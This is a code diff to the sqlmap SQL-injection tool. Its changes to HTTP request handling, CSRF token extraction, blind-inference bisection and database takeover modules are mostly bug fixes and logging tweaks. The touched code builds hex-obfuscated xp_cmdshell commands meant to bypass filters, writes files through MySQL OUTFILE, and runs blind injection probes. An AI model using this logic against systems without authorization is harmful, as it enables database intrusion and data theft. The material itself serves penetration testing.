if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
|
||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests")
|
||||
kb.droppingRequests = True
|
||||
warnMsg = "connection timed out to the target URL"
|
||||
elif "Connection reset" in tbMsg:
|
||||
if not conf.disablePrecon:
|
||||
@@ -640,6 +658,7 @@ class Connect(object):
|
||||
|
||||
if kb.testMode:
|
||||
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests")
|
||||
kb.droppingRequests = True
|
||||
warnMsg = "connection reset to the target URL"
|
||||
elif "URLError" in tbMsg or "error" in tbMsg:
|
||||
warnMsg = "unable to connect to the target URL"
|
||||
@@ -648,6 +667,8 @@ class Connect(object):
|
||||
warnMsg += " ('%s')" % match.group(1).strip()
|
||||
elif "NTLM" in tbMsg:
|
||||
warnMsg = "there has been a problem with NTLM authentication"
|
||||
elif "Invalid header name" in tbMsg: # (e.g. PostgreSQL ::Text payload)
|
||||
return None, None, None
|
||||
elif "BadStatusLine" in tbMsg:
|
||||
warnMsg = "connection dropped or unknown HTTP "
|
||||
warnMsg += "status code received"
|
||||
@@ -667,6 +688,9 @@ class Connect(object):
|
||||
if "BadStatusLine" not in tbMsg and any((conf.proxy, conf.tor)):
|
||||
warnMsg += " or proxy"
|
||||
|
||||
if silent:
|
||||
return None, None, None
|
||||
|
||||
with kb.locks.connError:
|
||||
kb.connErrorCounter += 1
|
||||
|
||||
@@ -680,9 +704,7 @@ class Connect(object):
|
||||
if kb.connErrorChoice is False:
|
||||
raise SqlmapConnectionException(warnMsg)
|
||||
|
||||
if silent:
|
||||
return None, None, None
|
||||
elif "forcibly closed" in tbMsg:
|
||||
if "forcibly closed" in tbMsg:
|
||||
logger.critical(warnMsg)
|
||||
return None, None, None
|
||||
elif ignoreTimeout and any(_ in tbMsg for _ in ("timed out", "IncompleteRead")):
|
||||
@@ -709,7 +731,7 @@ class Connect(object):
|
||||
page = getUnicode(page)
|
||||
socket.setdefaulttimeout(conf.timeout)
|
||||
|
||||
processResponse(page, responseHeaders)
|
||||
processResponse(page, responseHeaders, status)
|
||||
|
||||
if conn and getattr(conn, "redurl", None):
|
||||
_ = urlparse.urlsplit(conn.redurl)
|
||||
@@ -721,20 +743,20 @@ class Connect(object):
|
||||
requestMsg = re.sub("(?i)Content-length: \d+\n", "", requestMsg)
|
||||
requestMsg = re.sub("(?s)\n\n.+", "\n", requestMsg)
|
||||
|
||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, conn.code, status)
|
||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, conn.code, status)
|
||||
else:
|
||||
responseMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, status)
|
||||
responseMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, status)
|
||||
|
||||
if responseHeaders:
|
||||
logHeaders = "\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
logHeaders = "\r\n".join(["%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in responseHeaders.items()])
|
||||
|
||||
if not skipLogTraffic:
|
||||
logHTTPTraffic(requestMsg, "%s%s\n\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]))
|
||||
logHTTPTraffic(requestMsg, "%s%s\r\n\r\n%s" % (responseMsg, logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE]), start, time.time())
|
||||
|
||||
if conf.verbose <= 5:
|
||||
responseMsg += getUnicode(logHeaders)
|
||||
elif conf.verbose > 5:
|
||||
responseMsg += "%s\n\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
responseMsg += "%s\r\n\r\n%s" % (logHeaders, (page or "")[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
if not multipart:
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
|
||||
@@ -745,8 +767,8 @@ class Connect(object):
|
||||
def queryPage(value=None, place=None, content=False, getRatioValue=False, silent=False, method=None, timeBasedCompare=False, noteResponseTime=True, auxHeaders=None, response=False, raise404=None, removeReflection=True):
|
||||
"""
|
||||
This method calls a function to get the target URL page content
|
||||
and returns its page MD5 hash or a boolean value in case of
|
||||
string match check ('--string' command line parameter)
|
||||
and returns its page ratio (0 <= ratio <= 1) or a boolean value
|
||||
representing False/True match in case of !getRatioValue
|
||||
"""
|
||||
|
||||
if conf.direct:
|
||||
@@ -831,8 +853,7 @@ class Connect(object):
|
||||
if place == PLACE.COOKIE or place == PLACE.CUSTOM_HEADER and value.split(',')[0] == HTTP_HEADER.COOKIE:
|
||||
if kb.cookieEncodeChoice is None:
|
||||
msg = "do you want to URL encode cookie values (implementation specific)? %s" % ("[Y/n]" if not conf.url.endswith(".aspx") else "[y/N]") # Reference: https://support.microsoft.com/en-us/kb/313282
|
||||
choice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N')
|
||||
kb.cookieEncodeChoice = choice.upper().strip() == 'Y'
|
||||
kb.cookieEncodeChoice = readInput(msg, default='Y' if not conf.url.endswith(".aspx") else 'N', boolean=True)
|
||||
if not kb.cookieEncodeChoice:
|
||||
skip = True
|
||||
|
||||
@@ -884,7 +905,7 @@ class Connect(object):
|
||||
post = value
|
||||
|
||||
if PLACE.CUSTOM_POST in conf.parameters:
|
||||
post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value
|
||||
post = conf.parameters[PLACE.CUSTOM_POST].replace(kb.customInjectionMark, "") if place != PLACE.CUSTOM_POST or not value else value
|
||||
post = post.replace(ASTERISK_MARKER, '*') if post else post
|
||||
|
||||
if PLACE.COOKIE in conf.parameters:
|
||||
@@ -923,12 +944,14 @@ class Connect(object):
|
||||
return retVal
|
||||
|
||||
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
|
||||
match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "")
|
||||
token = (match.group(2) or match.group(3) or match.group(4)) if match else None
|
||||
token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "")
|
||||
|
||||
if not token:
|
||||
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
|
||||
token = match.group(1) if match else None
|
||||
token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "")
|
||||
|
||||
if not token:
|
||||
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
|
||||
token = match.group(1) if match else None
|
||||
|
||||
if not token:
|
||||
if conf.csrfUrl != conf.url and code == httplib.OK:
|
||||
@@ -956,6 +979,8 @@ class Connect(object):
|
||||
raise SqlmapTokenException, errMsg
|
||||
|
||||
if token:
|
||||
token = token.strip("'\"")
|
||||
|
||||
for place in (PLACE.GET, PLACE.POST):
|
||||
if place in conf.parameters:
|
||||
if place == PLACE.GET and get:
|
||||
@@ -1023,16 +1048,19 @@ class Connect(object):
|
||||
try:
|
||||
compiler.parse(unicodeencode(conf.evalCode.replace(';', '\n')))
|
||||
except SyntaxError, ex:
|
||||
original = replacement = ex.text.strip()
|
||||
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||
if _ in keywords:
|
||||
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||
if ex.text:
|
||||
original = replacement = ex.text.strip()
|
||||
for _ in re.findall(r"[A-Za-z_]+", original)[::-1]:
|
||||
if _ in keywords:
|
||||
replacement = replacement.replace(_, "%s%s" % (_, EVALCODE_KEYWORD_SUFFIX))
|
||||
break
|
||||
if original == replacement:
|
||||
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||
break
|
||||
if original == replacement:
|
||||
conf.evalCode = conf.evalCode.replace(EVALCODE_KEYWORD_SUFFIX, "")
|
||||
break
|
||||
else:
|
||||
conf.evalCode = conf.evalCode.replace(getUnicode(ex.text.strip(), UNICODE_ENCODING), replacement)
|
||||
else:
|
||||
conf.evalCode = conf.evalCode.replace(ex.text.strip(), replacement)
|
||||
break
|
||||
else:
|
||||
break
|
||||
|
||||
@@ -1051,39 +1079,39 @@ class Connect(object):
|
||||
if name != "__builtins__" and originals.get(name, "") != value:
|
||||
if isinstance(value, (basestring, int)):
|
||||
found = False
|
||||
value = getUnicode(value)
|
||||
value = getUnicode(value, UNICODE_ENCODING)
|
||||
|
||||
if kb.postHint and re.search(r"\b%s\b" % re.escape(name), post or ""):
|
||||
if kb.postHint in (POST_HINT.XML, POST_HINT.SOAP):
|
||||
if re.search(r"<%s\b" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post)
|
||||
post = re.sub(r"(?s)(<%s\b[^>]*>)(.*?)(</%s)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
elif re.search(r"\b%s>" % re.escape(name), post):
|
||||
found = True
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value, post)
|
||||
post = re.sub(r"(?s)(\b%s>)(.*?)(</[^<]*\b%s>)" % (re.escape(name), re.escape(name)), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
|
||||
regex = r"\b(%s)\b([^\w]+)(\w+)" % re.escape(name)
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, "\g<1>\g<2>%s" % value, post)
|
||||
post = re.sub(regex, "\g<1>\g<2>%s" % value.replace('\\', r'\\'), post)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter))
|
||||
if not found and re.search(regex, (post or "")):
|
||||
found = True
|
||||
post = re.sub(regex, "\g<1>%s\g<3>" % value, post)
|
||||
post = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), post)
|
||||
|
||||
if re.search(regex, (get or "")):
|
||||
found = True
|
||||
get = re.sub(regex, "\g<1>%s\g<3>" % value, get)
|
||||
get = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), get)
|
||||
|
||||
if re.search(regex, (query or "")):
|
||||
found = True
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value, uri)
|
||||
uri = re.sub(regex.replace(r"\A", r"\?"), "\g<1>%s\g<3>" % value.replace('\\', r'\\'), uri)
|
||||
|
||||
regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER))
|
||||
if re.search(regex, (cookie or "")):
|
||||
found = True
|
||||
cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie)
|
||||
cookie = re.sub(regex, "\g<1>%s\g<3>" % value.replace('\\', r'\\'), cookie)
|
||||
|
||||
if not found:
|
||||
if post is not None:
|
||||
@@ -1212,7 +1240,7 @@ class Connect(object):
|
||||
kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None
|
||||
|
||||
if content or response:
|
||||
return page, headers
|
||||
return page, headers, code
|
||||
|
||||
if getRatioValue:
|
||||
return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength)
|
||||
|
||||
@@ -42,6 +42,7 @@ from lib.core.exception import SqlmapConnectionException
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.exception import SqlmapUserQuitException
|
||||
from lib.core.settings import GET_VALUE_UPPERCASE_KEYWORDS
|
||||
from lib.core.settings import MAX_TECHNIQUES_PER_VALUE
|
||||
from lib.core.settings import SQL_SCALAR_REGEX
|
||||
from lib.core.threads import getCurrentThreadData
|
||||
@@ -345,6 +346,9 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
kb.safeCharEncode = safeCharEncode
|
||||
kb.resumeValues = resumeValue
|
||||
|
||||
for keyword in GET_VALUE_UPPERCASE_KEYWORDS:
|
||||
expression = re.sub("(?i)(\A|\(|\)|\s)%s(\Z|\(|\)|\s)" % keyword, r"\g<1>%s\g<2>" % keyword, expression)
|
||||
|
||||
if suppressOutput is not None:
|
||||
pushValue(getCurrentThreadData().disableStdOut)
|
||||
getCurrentThreadData().disableStdOut = suppressOutput
|
||||
@@ -356,7 +360,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
if expected == EXPECTED.BOOL:
|
||||
forgeCaseExpression = booleanExpression = expression
|
||||
|
||||
if expression.upper().startswith("SELECT "):
|
||||
if expression.startswith("SELECT "):
|
||||
booleanExpression = "(%s)=%s" % (booleanExpression, "'1'" if "'1'" in booleanExpression else "1")
|
||||
else:
|
||||
forgeCaseExpression = agent.forgeCaseStatement(expression)
|
||||
@@ -414,7 +418,7 @@ def getValue(expression, blind=True, union=True, error=True, time=True, fromUser
|
||||
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE
|
||||
|
||||
if found and conf.dnsDomain:
|
||||
_ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {"E": PAYLOAD.TECHNIQUE.ERROR, "Q": PAYLOAD.TECHNIQUE.QUERY, "U": PAYLOAD.TECHNIQUE.UNION}.items())))
|
||||
_ = "".join(filter(None, (key if isTechniqueAvailable(value) else None for key, value in {'E': PAYLOAD.TECHNIQUE.ERROR, 'Q': PAYLOAD.TECHNIQUE.QUERY, 'U': PAYLOAD.TECHNIQUE.UNION}.items())))
|
||||
warnMsg = "option '--dns-domain' will be ignored "
|
||||
warnMsg += "as faster techniques are usable "
|
||||
warnMsg += "(%s) " % _
|
||||
|
||||
@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import re
|
||||
import time
|
||||
import types
|
||||
import urllib2
|
||||
import urlparse
|
||||
@@ -69,6 +70,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||
return urllib2.Request(newurl, data=req.data, headers=req.headers, origin_req_host=req.get_origin_req_host())
|
||||
|
||||
def http_error_302(self, req, fp, code, msg, headers):
|
||||
start = time.time()
|
||||
content = None
|
||||
redurl = self._get_header_redirect(headers) if not conf.ignoreRedirects else None
|
||||
|
||||
@@ -92,18 +94,18 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||
threadData.lastRedirectMsg = (threadData.lastRequestUID, content)
|
||||
|
||||
redirectMsg = "HTTP redirect "
|
||||
redirectMsg += "[#%d] (%d %s):\n" % (threadData.lastRequestUID, code, getUnicode(msg))
|
||||
redirectMsg += "[#%d] (%d %s):\r\n" % (threadData.lastRequestUID, code, getUnicode(msg))
|
||||
|
||||
if headers:
|
||||
logHeaders = "\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items())
|
||||
logHeaders = "\r\n".join("%s: %s" % (getUnicode(key.capitalize() if isinstance(key, basestring) else key), getUnicode(value)) for (key, value) in headers.items())
|
||||
else:
|
||||
logHeaders = ""
|
||||
|
||||
redirectMsg += logHeaders
|
||||
if content:
|
||||
redirectMsg += "\n\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
redirectMsg += "\r\n\r\n%s" % getUnicode(content[:MAX_CONNECTION_CHUNK_SIZE])
|
||||
|
||||
logHTTPTraffic(threadData.lastRequestMsg, redirectMsg)
|
||||
logHTTPTraffic(threadData.lastRequestMsg, redirectMsg, start, time.time())
|
||||
logger.log(CUSTOM_LOGGING.TRAFFIC_IN, redirectMsg)
|
||||
|
||||
if redurl:
|
||||
@@ -127,7 +129,7 @@ class SmartRedirectHandler(urllib2.HTTPRedirectHandler):
|
||||
if HTTP_HEADER.COOKIE not in req.headers:
|
||||
req.headers[HTTP_HEADER.COOKIE] = _
|
||||
else:
|
||||
req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (_.split('=')[0], delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
|
||||
req.headers[HTTP_HEADER.COOKIE] = re.sub("%s{2,}" % delimiter, delimiter, ("%s%s%s" % (re.sub(r"\b%s=[^%s]*%s?" % (re.escape(_.split('=')[0]), delimiter, delimiter), "", req.headers[HTTP_HEADER.COOKIE]), delimiter, _)).strip(delimiter))
|
||||
try:
|
||||
result = urllib2.HTTPRedirectHandler.http_error_302(self, req, fp, code, msg, headers)
|
||||
except urllib2.HTTPError, e:
|
||||
|
||||
@@ -13,7 +13,7 @@ def getPageTemplate(payload, place):
|
||||
|
||||
if payload and place:
|
||||
if (payload, place) not in kb.pageTemplates:
|
||||
page, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
page, _, _ = Request.queryPage(payload, place, content=True, raise404=False)
|
||||
kb.pageTemplates[(payload, place)] = (page, kb.lastParserStatus is None)
|
||||
|
||||
retVal = kb.pageTemplates[(payload, place)]
|
||||
|
||||
@@ -80,12 +80,12 @@ class Abstraction(Web, UDF, XP_cmdshell):
|
||||
if not self.alwaysRetrieveCmdOutput:
|
||||
message = "do you want to retrieve the command standard "
|
||||
message += "output? [Y/n/a] "
|
||||
choice = readInput(message, default='Y')
|
||||
choice = readInput(message, default='Y').upper()
|
||||
|
||||
if choice in ('a', 'A'):
|
||||
if choice == 'A':
|
||||
self.alwaysRetrieveCmdOutput = True
|
||||
|
||||
if not choice or choice in ('y', 'Y') or self.alwaysRetrieveCmdOutput:
|
||||
if choice == 'Y' or self.alwaysRetrieveCmdOutput:
|
||||
output = self.evalCmd(cmd)
|
||||
|
||||
if output:
|
||||
@@ -189,7 +189,7 @@ class Abstraction(Web, UDF, XP_cmdshell):
|
||||
|
||||
if mandatory and not self.isDba():
|
||||
warnMsg = "functionality requested probably does not work because "
|
||||
warnMsg += "the curent session user is not a database administrator"
|
||||
warnMsg += "the current session user is not a database administrator"
|
||||
|
||||
if not conf.dbmsCred and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.PGSQL):
|
||||
warnMsg += ". You can try to use option '--dbms-cred' "
|
||||
|
||||
@@ -195,7 +195,7 @@ class UDF:
|
||||
|
||||
if not self.isDba():
|
||||
warnMsg = "functionality requested probably does not work because "
|
||||
warnMsg += "the curent session user is not a database administrator"
|
||||
warnMsg += "the current session user is not a database administrator"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
if not conf.shLib:
|
||||
|
||||
@@ -144,7 +144,7 @@ class Web:
|
||||
randInt = randomInt()
|
||||
query += "OR %d=%d " % (randInt, randInt)
|
||||
|
||||
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
|
||||
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding))
|
||||
query = agent.prefixQuery(query)
|
||||
query = agent.suffixQuery(query)
|
||||
payload = agent.payload(newValue=query)
|
||||
@@ -207,7 +207,7 @@ class Web:
|
||||
headers = {}
|
||||
been = set([conf.url])
|
||||
|
||||
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage, re.I):
|
||||
for match in re.finditer(r"=['\"]((https?):)?(//[^/'\"]+)?(/[\w/.-]*)\bwp-", kb.originalPage or "", re.I):
|
||||
url = "%s%s" % (conf.url.replace(conf.path, match.group(4)), "wp-content/wp-db.php")
|
||||
if url not in been:
|
||||
try:
|
||||
@@ -232,7 +232,7 @@ class Web:
|
||||
if place in conf.parameters:
|
||||
value = re.sub(r"(\A|&)(\w+)=", "\g<2>[]=", conf.parameters[place])
|
||||
if "[]" in value:
|
||||
page, headers = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, headers, _ = Request.queryPage(value=value, place=place, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
cookie = None
|
||||
@@ -244,12 +244,12 @@ class Web:
|
||||
if cookie:
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
value = re.sub(r"(\A|;)(\w+)=[^;]*", "\g<2>=", cookie)
|
||||
if value != cookie:
|
||||
page, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
page, _, _ = Request.queryPage(value=value, place=PLACE.COOKIE, content=True, raise404=False, silent=True, noteResponseTime=False)
|
||||
parseFilePaths(page)
|
||||
|
||||
directories = list(arrayizeValue(getManualDirectories()))
|
||||
|
||||
@@ -163,7 +163,7 @@ class XP_cmdshell:
|
||||
# Obfuscate the command to execute, also useful to bypass filters
|
||||
# on single-quotes
|
||||
self._randStr = randomStr(lowercase=True)
|
||||
self._cmd = "0x%s" % hexencode(cmd)
|
||||
self._cmd = "0x%s" % hexencode(cmd, conf.encoding)
|
||||
self._forgedCmd = "DECLARE @%s VARCHAR(8000);" % self._randStr
|
||||
self._forgedCmd += "SET @%s=%s;" % (self._randStr, self._cmd)
|
||||
|
||||
|
||||
@@ -39,7 +39,9 @@ from lib.core.settings import CHAR_INFERENCE_MARK
|
||||
from lib.core.settings import INFERENCE_BLANK_BREAK
|
||||
from lib.core.settings import INFERENCE_UNKNOWN_CHAR
|
||||
from lib.core.settings import INFERENCE_GREATER_CHAR
|
||||
from lib.core.settings import INFERENCE_GREATER_EQUALS_CHAR
|
||||
from lib.core.settings import INFERENCE_EQUALS_CHAR
|
||||
from lib.core.settings import INFERENCE_MARKER
|
||||
from lib.core.settings import INFERENCE_NOT_EQUALS_CHAR
|
||||
from lib.core.settings import MAX_BISECTION_LENGTH
|
||||
from lib.core.settings import MAX_REVALIDATION_STEPS
|
||||
@@ -67,7 +69,12 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
partialValue = u""
|
||||
finalValue = None
|
||||
retrievedLength = 0
|
||||
asciiTbl = getCharset(charsetType)
|
||||
|
||||
if charsetType is None and conf.charset:
|
||||
asciiTbl = sorted(set(ord(_) for _ in conf.charset))
|
||||
else:
|
||||
asciiTbl = getCharset(charsetType)
|
||||
|
||||
threadData = getCurrentThreadData()
|
||||
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
|
||||
retVal = hashDBRetrieve(expression, checkConf=True)
|
||||
@@ -109,7 +116,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
elif (kb.fileReadMode or dump) and conf.firstChar is not None and (isinstance(conf.firstChar, int) or (isinstance(conf.firstChar, basestring) and conf.firstChar.isdigit())):
|
||||
firstChar = int(conf.firstChar) - 1
|
||||
if kb.fileReadMode:
|
||||
firstChar *= 2
|
||||
firstChar <<= 1
|
||||
elif isinstance(firstChar, basestring) and firstChar.isdigit() or isinstance(firstChar, int):
|
||||
firstChar = int(firstChar) - 1
|
||||
else:
|
||||
@@ -187,8 +194,9 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
else:
|
||||
posValue = ord(hintValue[idx - 1])
|
||||
|
||||
forgedPayload = safeStringFormat(payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
forgedPayload = agent.extractPayload(payload)
|
||||
forgedPayload = safeStringFormat(forgedPayload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, posValue))
|
||||
result = Request.queryPage(agent.replacePayload(payload, forgedPayload), timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
|
||||
if result:
|
||||
@@ -270,86 +278,86 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
|
||||
lastCheck = False
|
||||
unexpectedCode = False
|
||||
|
||||
while len(charTbl) != 1:
|
||||
position = None
|
||||
if continuousOrder:
|
||||
while len(charTbl) > 1:
|
||||
position = None
|
||||
|
||||
if charsetType is None:
|
||||
if not firstCheck:
|
||||
try:
|
||||
if charsetType is None:
|
||||
if not firstCheck:
|
||||
try:
|
||||
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
|
||||
except IndexError:
|
||||
lastChar = None
|
||||
if 'a' <= lastChar <= 'z':
|
||||
position = charTbl.index(ord('a') - 1) # 96
|
||||
elif 'A' <= lastChar <= 'Z':
|
||||
position = charTbl.index(ord('A') - 1) # 64
|
||||
elif '0' <= lastChar <= '9':
|
||||
position = charTbl.index(ord('0') - 1) # 47
|
||||
except ValueError:
|
||||
pass
|
||||
finally:
|
||||
firstCheck = True
|
||||
|
||||
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
|
||||
if charTbl[(len(charTbl) >> 1)] < ord(' '):
|
||||
try:
|
||||
# favorize last char check if current value inclines toward 0
|
||||
position = charTbl.index(1)
|
||||
try:
|
||||
lastChar = [_ for _ in threadData.shared.value if _ is not None][-1]
|
||||
except IndexError:
|
||||
lastChar = None
|
||||
if 'a' <= lastChar <= 'z':
|
||||
position = charTbl.index(ord('a') - 1) # 96
|
||||
elif 'A' <= lastChar <= 'Z':
|
||||
position = charTbl.index(ord('A') - 1) # 64
|
||||
elif '0' <= lastChar <= '9':
|
||||
position = charTbl.index(ord('0') - 1) # 47
|
||||
except ValueError:
|
||||
pass
|
||||
finally:
|
||||
lastCheck = True
|
||||
firstCheck = True
|
||||
|
||||
if position is None:
|
||||
position = (len(charTbl) >> 1)
|
||||
elif not lastCheck and numThreads == 1: # not usable in multi-threading environment
|
||||
if charTbl[(len(charTbl) >> 1)] < ord(' '):
|
||||
try:
|
||||
# favorize last char check if current value inclines toward 0
|
||||
position = charTbl.index(1)
|
||||
except ValueError:
|
||||
pass
|
||||
finally:
|
||||
lastCheck = True
|
||||
|
||||
posValue = charTbl[position]
|
||||
falsePayload = None
|
||||
if position is None:
|
||||
position = (len(charTbl) >> 1)
|
||||
|
||||
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))
|
||||
else:
|
||||
# e.g.: ... > '%c' -> ... > ORD(..)
|
||||
markingValue = "'%s'" % CHAR_INFERENCE_MARK
|
||||
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue))
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL)
|
||||
posValue = charTbl[position]
|
||||
falsePayload = None
|
||||
|
||||
if timeBasedCompare:
|
||||
if kb.responseTimeMode:
|
||||
kb.responseTimePayload = falsePayload
|
||||
if "'%s'" % CHAR_INFERENCE_MARK not in payload:
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx, posValue))
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER))
|
||||
else:
|
||||
kb.responseTimePayload = None
|
||||
# e.g.: ... > '%c' -> ... > ORD(..)
|
||||
markingValue = "'%s'" % CHAR_INFERENCE_MARK
|
||||
unescapedCharValue = unescaper.escape("'%s'" % decodeIntToUnicode(posValue))
|
||||
forgedPayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, unescapedCharValue)
|
||||
falsePayload = safeStringFormat(payload, (expressionUnescaped, idx)).replace(markingValue, NULL)
|
||||
|
||||
result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False)
|
||||
incrementCounter(kb.technique)
|
||||
if timeBasedCompare:
|
||||
if kb.responseTimeMode:
|
||||
kb.responseTimePayload = falsePayload
|
||||
else:
|
||||
kb.responseTimePayload = None
|
||||
|
||||
